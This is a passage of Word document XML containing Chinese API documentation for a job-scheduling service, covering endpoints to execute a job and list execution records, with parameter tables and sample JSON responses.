        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D012566" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6004AE44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C17E271" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C4C3610" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62C2B856" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>TaskParam</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6326A1BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>与创建的时候传递的参数一致</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B5702E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="393" w:name="_Toc115166269"/>
      <w:bookmarkStart w:id="394" w:name="立即执行某个作业"/>
      <w:bookmarkEnd w:id="392"/>
      <w:r>
        <w:t>立即执行某个作业</w:t>
      </w:r>
      <w:bookmarkEnd w:id="393"/>
    </w:p>
    <w:p w14:paraId="74167F46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1DA534" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/execute/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725790A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6DC7680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4548167" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58F50B48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BBEB235" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6DF52D15" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15EFC1E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29EE3BBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3376C1CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71CF8280" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CE5CB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/execute/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>5d1c76e067657c0a04cfbf67</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="47C7A7D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517E5791" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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d61c323e46813eb98f513"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F23090"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837"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1627"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C76FCA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43DEAD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="166619FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65FFAC04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A6A979B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC68AE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ACB6E4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59534428" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业执行记录id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="164716CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="395" w:name="_Toc115166270"/>
      <w:bookmarkStart w:id="396" w:name="查看作业执行列表"/>
      <w:bookmarkEnd w:id="394"/>
      <w:r>
        <w:t>查看作业执行列表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="395"/>
    </w:p>
    <w:p w14:paraId="4041F210" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF02FDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>execute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6569529B"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702"/>
        <w:gridCol w:w="1435"/>
        <w:gridCol w:w="6945"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="55F2D9D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492E0EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61CB84B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57AE54AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5ECE1EAD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="609C165F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F1331B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E675FAB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统类别(必填)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B0DB1C9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247BC0EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AA4CAB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F00C18A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="34E80915" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="176A4004" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startDateRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6226A4AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F888F22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业执行起始时间范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6308BCDB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44B13CAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>durations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E718EB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List&lt;Integer&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="457CE277" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行时间范围 0/1/2/3/4/5, 1分钟内/1~3分钟内/3~5分钟内/5~10分钟内/10~30分钟内/超出30分钟</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="263D9340" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6141FE4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>statuses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BC549D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List&lt;Integer&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AAE27E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描状态 1.准备执行, 2.正在执行, 3.执行成功, 4.执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2346B8EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>排序字段：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1104"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="325417C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B30F1D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FBA1F6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="46D7E271" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F20E0D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B5E971D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2728FA4B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6316D7A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E5BE9E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="057EA803" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A16CBB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0791F55D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0E1B730D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6700298B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C46AB04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E196ED9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BE4C5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execute?osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F840A83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67941A0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"row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da35425d89101991a6e32"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d1da35425d89101991a6e3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文件完整性校验-20190704145709"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>taskRecordId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d1da35425d89101991a6e33"</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gent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osTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>cronEnable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
